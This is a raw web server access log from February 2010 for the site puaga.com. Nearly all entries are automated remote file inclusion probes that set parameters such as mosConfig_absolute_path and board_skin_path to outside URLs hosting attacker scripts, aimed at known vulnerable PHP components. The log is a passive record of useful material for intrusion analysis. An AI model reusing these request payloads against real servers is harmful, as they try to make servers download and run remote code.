74.205.120.218 - - [18/Feb/2010:08:34:26 -0800] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:34:27 -0800] "GET /logs/access_100118.log%20%20/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:34:27 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:34:41 -0800] "GET /logs/access_100126.log%20%20/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:08:35:24 -0800] "GET /gnuboard4/bbs/write_coment_update.php/?board_skin_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:08:35:24 -0800] "GET /logs//gnuboard4/bbs/write_coment_update.php/?board_skin_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:08:35:24 -0800] "GET /logs/access_100210.log//gnuboard4/bbs/write_coment_update.php/?board_skin_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:08:35:33 -0800] "GET /logs/access_100202.log//gnuboard4/bbs/write_coment_update.php/?board_skin_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [18/Feb/2010:08:35:55 -0800] "GET /logs/access_100103.log//bbs/skin/ggambo6010_music/sendmail.php=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:35:55 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:35:56 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:35:56 -0800] "GET /include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:35:56 -0800] "GET /include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:35:57 -0800] "GET /logs//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:35:57 -0800] "GET /logs//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:08:37:30 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:08:37:54 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:37:56 -0800] "GET /logs/access_100205.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:37:57 -0800] "GET /logs/access_100205.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:38:23 -0800] "GET /logs/access_100207.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:38:24 -0800] "GET /modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:38:25 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:38:26 -0800] "GET /logs/access_100207.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:38:27 -0800] "GET /modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:38:27 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [18/Feb/2010:08:39:20 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [18/Feb/2010:08:39:21 -0800] "GET /orange_g/forum/viewtopic.php?p=25807 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
89.36.175.10 - - [18/Feb/2010:08:39:33 -0800] "GET /logs/access_100116.log/error.php?dir=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:08:39:33 -0800] "GET /error.php?dir=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:08:39:33 -0800] "GET /logs/error.php?dir=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:08:39:51 -0800] "GET /logs/access_100123.log/?sourcedir=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:08:39:51 -0800] "GET /logs/?sourcedir=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:08:39:52 -0800] "GET /?sourcedir=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:39:52 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:39:52 -0800] "GET /logs/access_100114.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:39:53 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:39:53 -0800] "GET /logs/access_100114.log%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:39:53 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:39:55 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:40:09 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:40:20 -0800] "GET /logs/access_100118.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:41:01 -0800] "GET /logs/access_100109.log//modules/xfsection/modify.php?dir_module=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:08:41:13 -0800] "GET /logs/p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:08:41:13 -0800] "GET /p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:08:41:13 -0800] "GET /logs/access_091217.log/p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:08:41:27 -0800] "GET /logs/p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:08:41:27 -0800] "GET /p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:08:41:27 -0800] "GET /logs/access_091217.log/p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:08:42:18 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:08:42:34 -0800] "GET /logs/access_100103.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:08:42:53 -0800] "GET /logs/access_100201.log/?sourcedir=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:43:10 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:43:11 -0800] "GET /include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:43:12 -0800] "GET /logs//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:08:44:33 -0800] "GET /logs/access_100201.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [18/Feb/2010:08:44:50 -0800] "GET /logs/access_100123.log//?path%5Bdocroot%5D=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
75.119.216.146 - - [18/Feb/2010:08:44:51 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 200 4947 "-" "libwww-perl/5.805" "www.puaga.com"
75.119.216.146 - - [18/Feb/2010:08:44:51 -0800] "GET /?path%5Bdocroot%5D=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
78.110.50.120 - - [18/Feb/2010:08:45:09 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 200 4947 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.120 - - [18/Feb/2010:08:45:09 -0800] "GET /?path%5Bdocroot%5D=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 200 3642 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.120 - - [18/Feb/2010:08:45:12 -0800] "GET /logs/access_100123.log//?path%5Bdocroot%5D=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:08:45:53 -0800] "GET /include.php?path[docroot]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:08:45:53 -0800] "GET /logs//include.php?path[docroot]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:08:45:53 -0800] "GET /logs/access_100123.log//include.php?path[docroot]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:08:46:11 -0800] "GET /include.php?path[docroot]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:08:46:11 -0800] "GET /logs//include.php?path[docroot]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:08:46:11 -0800] "GET /logs/access_100123.log//include.php?path[docroot]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [18/Feb/2010:08:46:50 -0800] "GET /logs/access_100126.log//include/write.php?dir=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:46:51 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:46:51 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:46:51 -0800] "GET /logs/access_100125.log%20%20//bbs/delete_comment.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [18/Feb/2010:08:47:07 -0800] "GET /logs/access_100115.log//?path%5Bdocroot%5D=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
75.119.216.146 - - [18/Feb/2010:08:47:37 -0800] "GET /logs/access_100115.log//?path%5Bdocroot%5D=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
75.119.216.146 - - [18/Feb/2010:08:47:53 -0800] "GET /logs/access_100123.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
75.119.216.146 - - [18/Feb/2010:08:47:53 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
75.119.216.146 - - [18/Feb/2010:08:47:53 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:48:16 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:48:16 -0800] "GET /logs/access_100129.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:48:16 -0800] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.183.77.248 - - [18/Feb/2010:08:48:16 -0800] "GET /logs/access_100109.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.neosemitech.com/board/data/session/f10/des/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:08:48:17 -0800] "GET /logs/access.log%20%20//bbs/delete_comment.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [18/Feb/2010:08:49:06 -0800] "GET /logs/access_100208.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:49:23 -0800] "GET /logs/access_100211.log//errors.php?error=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:49:24 -0800] "GET /errors.php?error=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:49:25 -0800] "GET /logs//errors.php?error=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:49:26 -0800] "GET /logs//errors.php?error=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:49:27 -0800] "GET /logs/access_100211.log//errors.php?error=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:49:27 -0800] "GET /logs/access_100211.log//errors.php?error=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:49:28 -0800] "GET /errors.php?error=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:49:28 -0800] "GET /errors.php?error=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:49:29 -0800] "GET /logs//errors.php?error=http://serve.welovejesus.co.kr/data/log/.xB????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.144.48 - - [18/Feb/2010:08:49:29 -0800] "GET /logs//errors.php?error=http://serve.welovejesus.co.kr/data/log/a.printer.xpp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [18/Feb/2010:08:49:30 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.120 - - [18/Feb/2010:08:49:30 -0800] "GET /logs/access_100123.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.120 - - [18/Feb/2010:08:49:30 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 200 3642 "-" "libwww-perl/5.831" "www.puaga.com"
122.199.140.158 - - [18/Feb/2010:08:49:31 -0800] "GET /errors.php?error=http://cs.kku.ac.kr/data/member/as/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [18/Feb/2010:08:49:31 -0800] "GET /logs/access_100208.log%20%20/errors.php?error=http://cs.kku.ac.kr/data/member/as/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [18/Feb/2010:08:49:32 -0800] "GET /logs/errors.php?error=http://cs.kku.ac.kr/data/member/as/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [18/Feb/2010:08:49:55 -0800] "GET /logs/access_100109.log%20%20/errors.php?error=http://cs.kku.ac.kr/data/member/as/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:08:50:30 -0800] "GET /logs//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:08:50:30 -0800] "GET /administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:08:50:30 -0800] "GET /logs/access_100104.log//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:08:50:41 -0800] "GET /logs/access_100123.log%20%20//include.php?path[docroot]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [18/Feb/2010:08:51:07 -0800] "GET /logs/access_100208.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:08:51:10 -0800] "GET /logs/access_100123.log%20%20//include.php?path[docroot]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:08:51:27 -0800] "GET /logs/access_100115.log%20%20//include.php?path[docroot]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:08:51:41 -0800] "GET /logs/access_091118.log/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:08:51:41 -0800] "GET /logs/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:08:51:42 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:08:51:58 -0800] "GET /logs/access_100115.log%20%20//include.php?path[docroot]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:08:53:15 -0800] "GET /?board_skin_path=http://80.59.61.12/id.txt?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.834" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:08:53:16 -0800] "GET /logs/access.log/?board_skin_path=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:08:53:16 -0800] "GET /logs/?board_skin_path=http://80.59.61.12/id.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.834" "www.puaga.com"
